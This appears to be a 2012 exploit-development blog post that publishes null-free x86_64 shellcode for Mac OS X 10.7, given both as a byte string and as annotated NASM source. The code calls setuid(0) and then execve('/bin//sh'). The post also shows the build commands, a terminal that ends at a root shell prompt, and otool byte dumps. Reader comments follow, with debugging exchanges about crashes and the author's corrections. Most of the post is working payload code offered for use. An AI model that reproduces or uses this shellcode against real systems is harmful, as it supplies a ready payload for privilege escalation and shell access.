More smaller shellcode, this time, tested and verified working on OSX 10.7.
Shellcode
/* * Name: setuid_shell_x86_64 * Qualities: Null-Free * Platforms: Mac OS X 10.7 Intel x86_64 * * Created on: Apr 12, 2012 * Author: Dustin Schultz - TheXploit.com */ char shellcode[] = "\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0" "\x0f\x05\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x48\xbf\x2f\x62" "\x69\x6e\x2f\x2f\x73\x68\x52\x57\x48\x89\xe7\x52\x57\x48\x89\xe6" "\x0f\x05";
Source
; File: setuid_shell_x86_64.asm ; Author: Dustin Schultz - TheXploit.com BITS 64 section .text global start start: mov r8b, 0x02 ; Unix class system calls = 2 shl r8, 24 ; shift left 24 to the upper order bits or r8, 0x17 ; setuid = 23, or with class = 0x2000017 xor edi, edi ; zero out edi, uid = 0 mov rax, r8 ; syscall number in rax ; mov rax, 0x2000017 syscall ; invoke kernel add r8, 0x24 ; 0x24+r8=0x200003b mov rax, r8 ; syscall number in rax xor rdx, rdx ; zero out rdx, null terminator ; mov rax, 0x200003b mov rdi, 0x68732f2f6e69622f ; /bin//sh in hex push rdx ; push backwards, null terminator push rdi ; address of /bin//sh mov rdi, rsp ; null terminated /bin/sh pointer push rdx ; push backwards, null terminator push rdi ; address of /bin//sh mov rsi, rsp ; null terminated /bin/sh pointer syscall ; invoke kernel
To test:
dustin@sholtz:~/$ nasm -f macho64 shell.s dustin@sholtz:~/$ ld -static -arch x86_64 shell.o dustin@sholtz:~/$ ./a.out bash-3.2#
Bytes from otool:
dustin@sholtz:~/$ otool -t a.out a.out: (__TEXT,__text) section 0000000100000f86 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0 0000000100000f96 0f 05 49 83 c0 24 4c 89 c0 48 31 d2 48 bf 2f 62 0000000100000fa6 69 6e 2f 2f 73 68 52 57 48 89 e7 52 57 48 89 e6 0000000100000fb6 0f 05
Enjoy!
Hi! Thanks for your work, but I have a problem. When I execute the a.out file I get the following error: Bad system call’.~/Desktop/Overflow$ ld -arch x86_64 setuid_shell_x86_64.o~/Desktop/Overflow$ ./a.out Bad system call But the otool output is correct, and when I test it in the way you explain in the next post, there are no problem, and the shell runs perfectly. Have you any thought about this unexpected behaviour? I would like to know what’s happening with the a.out file.Thank you for the blog, it’s very interesting and didactic.
Messi, I had the wrong implementation. I’ve updated and it should work now. Sorry
Thank you so much for this sharing.
I put this byte shellcode into the test template you provide at “Testing Your Unix-Based Shellcode on a Non-Executable Stack or Heap”, and change the size to 0x2d(45 as decimal).
But I get “Segmentation fault: 11″
I am using Mac OS X 10.7.2 lion. I can successfully reproduce the example of “Testing Your Unix-Based Shellcode on a Non-Executable Stack or Heap”.
Do I miss something? Can you test this 45 bytes shellcode with your template?
Sincerely looking forward to your reply.
Thanks for pointing this out. It worked correctly in nasm – spawning a new shell but you’re absolutely right, it doesn’t work with the shellcode template. I’ve updated it by making rsi a valid pointer like you pointed out. Thanks again!